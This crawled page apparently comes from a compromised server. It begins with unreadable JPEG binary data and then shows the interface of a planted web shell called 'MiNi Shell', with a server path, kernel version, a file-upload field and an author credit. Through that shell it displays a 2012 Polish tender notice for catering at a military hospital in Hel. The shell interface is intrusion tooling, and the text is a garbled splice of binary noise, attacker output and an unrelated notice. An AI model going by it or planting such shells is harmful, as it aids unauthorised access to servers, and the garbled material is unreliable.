JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121127/250105-N-2012.html

<p class="kh_header"><b>Hel: ŚWIADCZENIE USŁUG W ZAKRESIE PRZYGOTOWANIA
 I DOSTARCZANIA POSIŁKÓW DLA PACJENTÓW 
115 SZPITALA W HELU</b><br>
<b>Numer ogłoszenia: 250105 - 2012; data zamieszczenia: 27.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 115 Szpital Wojskowy z Przychodnią SP ZOZ , ul. Boczna 10, 84-150 Hel, woj. pomorskie, tel. 058 6757401, faks 058 6757402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.115szpital.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG W ZAKRESIE PRZYGOTOWANIA
 I DOSTARCZANIA POSIŁKÓW DLA PACJENTÓW 
115 SZPITALA W HELU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. W zakres przedmiotu zamówienia wchodzi całodobowe wyżywienie hospitalizowanych pacjentów 115 Szpitala Wojskowego z Przychodnią SP ZOZ w Helu, poprzez świadczenie usług cateringowych w zakresie przygotowywania, na bazie kuchni Wykonawcy i dostarczania gotowych posiłków w wyznaczonym czasie i miejscu do siedziby Zamawiającego. 2. Świadczenie usługi żywienia dla pacjentów szpitala musi się odbywać zgodnie z ustawą o bezpieczeństwie żywności i żywienia z dnia 25 sierpnia 2006 r. (Dz. U. z 2006 r. nr 171, poz. 1225 z późn. zm.) oraz zasadami systemu HACCP. 3.Wykonawca zobowiązany jest do codziennego przygotowywania, gotowania i dowożenia posiłków całodniowych wg norm i zasad żywienia przypisanych placówkom służby zdrowia z uwzględnieniem diet ściśle wg potrzeb Zamawiającego oraz zgodnie z jadłospisem sporządzonym przez dietetyka 115 Szpitala, przez okres 12 miesięcy. 4. Przez pojęcie całodobowego wyżywienia pacjenta należy rozumieć: całodzienne wyżywienie jednej osoby (pacjenta) uwzględniające śniadanie, obiad (dwudaniowy) i kolację (ś, o, k). 5.Przygotowywanie posiłków odbywać się będzie z uwzględnieniem n/w diet stosowanych w 115 szpitalu: a) dieta łatwostrawna (ś,o,k) wartość energetyczna od 2000 kcal do 2500 kcal wartość odżywcza - białko od 70 g do 80 g, tłuszcze zwierzęce i roślinne od 50 g do 60 g, węglowodany 250 g do 300 g, wapń 600 mg - 800 mg, żelazo 20 mg, witamina C od 50 mg do 70 mg, witamina A 5000 jm. b) diety indywidualne (skład posiłków według zaleceń lekarskich) cukrzycowa - (ś, II ś, o, podwieczorek, k) , wątrobowa - (ś,o,k), żołądkowa - (ś,o,k)  zalecenia lekarskie dotyczą zmian w ilości białka, tłuszczów, węglowodanów, witamin oraz wartości odżywczej. Prognozowana średnia ilość żywionych pacjentów: 33 osoby na dobę. 6. Wsad do kotła całodobowego wyżywienia jednego pacjenta musi wynosić minimum 8,00 brutto PLN. (Wartość 8,00 brutto PLN odnosi się do aktualnych cen surowca dostępnych na rynku). Na żądanie Zamawiającego wykonawca jest zobowiązany przedłożyć do wglądu Zamawiającego dokumenty potwierdzające zachowanie minimalnej wysokości wsadu do kotła. 7. Zamawiający szacuje, że łączna ilość całodobowych posiłków (diet) w trakcie trwania umowy będzie wynosiła: 9.700 diet łatwostrawnych, 2.300 diet cukrzycowych, 250 diet wątrobowych, 170 diet żołądkowa. 8. Czas dostarczania: śniadanie  godz. 07.30, obiad  godz. 12.30, kolacja  godz. 17.00. 9. Posiłki dodatkowe: II śniadanie i podwieczorki (w przypadku diety cukrzycowej) mogą być dostarczane w następujący sposób: drugie śniadanie - razem ze śniadaniem, podwieczorek - razem z obiadem. 10. Posiłki będą posiadały wartość kaloryczną, białkową i węglowodanową przewidywaną dla poszczególnych diet i grup konsumentów, w jadłospisie będą uwzględnione: śniadania: kawa biała, raz w tygodniu kakao, pieczywo (graham, żytnie, pszenne), dodatek tłuszczowy - masło, dodatek nabiałowy lub dodatek z białka zwierzęcego o niskiej zawartości tłuszczu. II śniadanie w przypadku diety cukrzycowej pięcioposiłkowej: np. jabłko, jogurt naturalny, kanapka z wędliną o niskiej zawartości tłuszczu, kisiel bez cukru, budyń bez cukru, kasza manna bez cukru, suchary bez cukru kefir, maślanka. obiad: zupa, drugie danie składające się ze składnika: węglowodanowy (ziemniaki, makaron, kasze), składnika białkowego, składnika warzywnego (surowego lub przetworzonego), napoju. podwieczorek w przypadku diety cukrzycowej pięcioposiłkowej: np. jabłko, jogurt naturalny, kanapka z wędliną o niskiej zawartości tłuszczu, kisiel bez cukru,  budyń bez cukru, kasza manna bez cukru, suchary bez cukru kefir, maślanka. kolacja: gorący napój, pieczywo (graham, żytnie, pszenne), dodatek tłuszczowy - masło, dodatek nabiałowy lub dodatek z białka zwierzęcego o niskiej zawartości tłuszczu lub potrawa z białka roślinnego z dodatkiem węglowodanowym, lub potrawa warzywna lub mięsno-warzywna z dodatkiem węglowodanowym. W przypadku dni świątecznych (Wigilia, Wielkanoc) należy uwzględnić potrawy tradycyjne (barszcz z uszkami, karp, potrawy mączne gotowane, ciasta - jabłecznik, babka, biszkopty). 11. Możliwość zwiększenia ilości przygotowywanych posiłków dla dodatkowo żywionych pacjentów w dni świąteczne (od 1 do 5 posiłków). Powyższa sytuacja dotyczy zwiększonego stanu chorych, czyli sytuacji nieprzewidywalnych. 12. Prognozowana liczba dzienna przygotowywanych całodobowych posiłków różnych rodzajów wynosi średnio 33 i zależeć będzie od aktualnej ilości hospitalizowanych pacjentów, 13. Terminy przekazania Wykonawcy informacji dotyczących planowanej ilości żywionych: w dni robocze - w godz. 14.30 do 15.30 na dzień następny. dla dni świątecznych - w godz. 14.00 do 15.00 dnia przedświątecznego na dni świąteczne. Inne warunki realizacji usługi: 1.Przygotowywanie przez Wykonawcę posiłków na podstawie dekadowych jadłospisów sporządzanych przez dietetyka 115 Szpitala  z produktów spożywczych zakupionych u dostawców specjalizujących się w sprzedaży tego typu asortymentu. Jadłospisy dekadowe sporządzone przez dietetyka w uzgodnieniu z Wykonawcą muszą być zaakceptowane przez Dyrektora 115 Szpitala. 2. Umiejscowienie gotowych potraw w dostosowanych pojemnikach do transportu żywności, które posiadają odpowiednie atesty i pozwalających utrzymać odpowiednią temperaturę posiłków. 3. Temperatura dostarczonych posiłków powinna wynosić: dla żywności wymagającej przechowywania w warunkach chłodniczych, wymagających schładzania od 0 - 4° C dla potraw poddawanych obróbce termicznej serwowanych na gorąco, temperatura powinna wynosić nie mniej 65° C 4. Oznakowanie pojemników jednostkowych dla każdego rodzaju diety, potrawy wraz z godziną umieszczenia potrawy w pojemniku po zakończeniu procesu technologicznego. 5. Wykonanie trzech cykli transportowych w ciągu jednej doby, środkiem transportu dostosowanym do przewozu posiłków i posiadającym dopuszczenie do przewozu posiłków. 6.Dostawę przygotowanych posiłków do Zamawiającego tj. do pomieszczenia wydawania posiłków zlokalizowanego na pierwszym piętrze głównego budynku 115 szpitala. 7. Odbiór brudnych pojemników do transportu żywności. Zmywanie talerzy zabezpiecza Zamawiający. 8. Przygotowanie i dostarczanie zamówionych posiłków przez 7 dni w tygodniu. 9. Wykonawca dobrowolnie będzie poddawał się kontroli Wojskowego Ośrodka Medycyny Prewencyjnej w Gdyni, sanepidu lub innych upoważnionych organów oraz przedstawi Zamawiającemu kopię protokołu z tej kontroli z kontroli. 10. Sprawy sporne z zakresu jakości przyrządzanych i dostarczanych potraw rozpatrywać będzie Wojskowy Ośrodek Medycyny Prewencyjnej w Gdyni. 11. Żaden posiłek przygotowany i dostarczony w ciągu doby nie może powtórzyć się w ciągu tej samej dekady. 12. Przechowywanie z każdego dnia próbek żywnościowych z poszczególnych diet zgodnie z obowiązującymi przepisami. 13. Odbiór, wywóz z terenu szpitala i utylizacja poza terenem szpitalnym resztek pokonsumpcyjnych. 14. Warunki przechowywania posiłków, transport oraz sposób przygotowania pożywienia muszą spełniać wszelkie wymogi sanitarno-epidemiologiczne..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca musi wnieść wadium przetargowe w wysokości 9.000,00 zł przed upływem terminu do składania ofert wskazanym w pkt XI SIWZ. 2. Formy wnoszenia wadium określa art. 45 ust.6 Ustawy. 3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto nr 84 1240 5370 1111 0000 5364 7102. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli przed upływem terminu do składania ofert znajdzie się na rachunku bankowym Zamawiającego. 4. W celu ułatwienia sprawdzenia ofert uprzejmie prosimy o ile to będzie możliwe o załączenie kserokopii dowodu wpłaty wadium.
5. W przypadku wnoszenia wadium w pozostałych dopuszczalnych formach, wymagane jest złożenie oryginalnego dokumentu gwarancji/poręczenia. Oryginał gwarancji/poręczenia powinien być umieszczony w ofercie w sposób umożliwiający jego zwrot zgodnie z ustawą. Dokument wadium wniesionego w formie gwarancji/poręczenia powinien zawierać klauzulę o gwarantowaniu wypłaty należności w sposób nieodwołalny, bezwarunkowy i na pierwsze pisemne żądanie Zamawiającego. Wadium takie powinno obejmować cały okres związania ofertą, poczynając od daty składania ofert.
6. Wadium zostanie zatrzymane w przypadkach określonych art. 46 ust. 4a i 5 oraz zwrócone  w przypadkach określonych w art. 46 ust 1÷4 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ramach tego warunku wykonawca zobowiązany jest do: wykazania się w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, iż wykonał minimum dwa zamówienie w zakresie kompleksowego żywienia pacjentów w placówkach służby zdrowia, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych o wartości nie mniejszej niż 300.000,00 zł. brutto każde oraz załączy dokumenty potwierdzające, że usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ramach tego warunku: Wykonawca musi dysponować niezbędnymi do wykonania zamówienia narzędziami tj: lokalem kuchenny wyposażonym w niezbędne urządzenia zapewniające przygotowanie posiłków; środkiem transportu przystosowanym do przewozu posiłków; zastępczym środkiem transportu używanym w przypadku awarii podstawowego środka transportu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ramach tego warunku: Wykonawca musi dysponować niezbędnym do wykonania usługi potencjałem kadrowym tj. personelem posiadającym kwalifikacje niezbędne do wykonania zamówienia w tym w szczególności kucharzem.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a. Aktualną decyzję o zatwierdzeniu przez właściwego miejscowo (pod względem lokalizacji zakładu przygotowującego posiłki) Państwowego Powiatowego Inspektora Sanitarnego potwierdzającą, że obiekt spełnia wymagania konieczne do zapewnienia higieny w procesie produkcji i w obrocie środkami spożywczymi oraz do zapewnienia właściwej jakości zdrowotnej tych artykułów w zakresie produkcji żywności, dozwolonych substancji dodatkowych lub innych składników żywności oraz materiałów i wyrobów przeznaczonych do kontaktu z żywnością lub obrotem nimi. Decyzja Państwowego Powiatowego Inspektora Sanitarnego ma zawierać zezwolenie na prowadzenie żywienia zbiorowego i realizację usługi w systemie cateringowym.
b. Aktualną decyzję właściwego Państwowego Powiatowego Inspektora Sanitarnego właściwego ze względu na siedzibę Wykonawcy zatwierdzająca środek transportu służący do wykonywania zamówienia jako spełniający odpowiednie wymagania sanitarne do celów przewozu środków spożywczych (posiłków).
c. Dokument potwierdzający, że Wykonawca wdrożył obligatoryjny system zapewnienia bezpieczeństwa zdrowotnego żywności HACCP. Zamawiający wymaga złożenia oświadczenia, że system został wdrożony lub jest wdrażany z jednoczesnym zobowiązaniem, że na każde wezwanie Zamawiającego przedstawi on dokumenty potwierdzające wdrożenie systemu.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a. Wypełniony i podpisany druk Oferta (zał. nr 1 do SIWZ),
b. Wypełniony i podpisany Formularz cenowy (zał. nr 2 do SIWZ)
c. Pełnomocnictwo do podpisania oferty, o ile nie wynika to z ustawy lub innych dokumentów załączonych do oferty.
d. Oświadczenie o dysponowaniu odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia (według wzoru - załącznik nr 6 do SIWZ),</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w sytuacji zmiany ogólno obowiązujących przepisów prawa, w tym prawa podatkowego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.115szpital.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 115 Szpitala Wojskowego z Przychodnią SP ZOZ, 84-150 Hel, ul. Boczna 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.12.2012 godzina 08:00, miejsce: Sekretariat 115 Szpitala Wojskowego z Przychodnią SP ZOZ, 84-150 Hel, ul. Boczna 10- budynek administracyjny, drugie piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com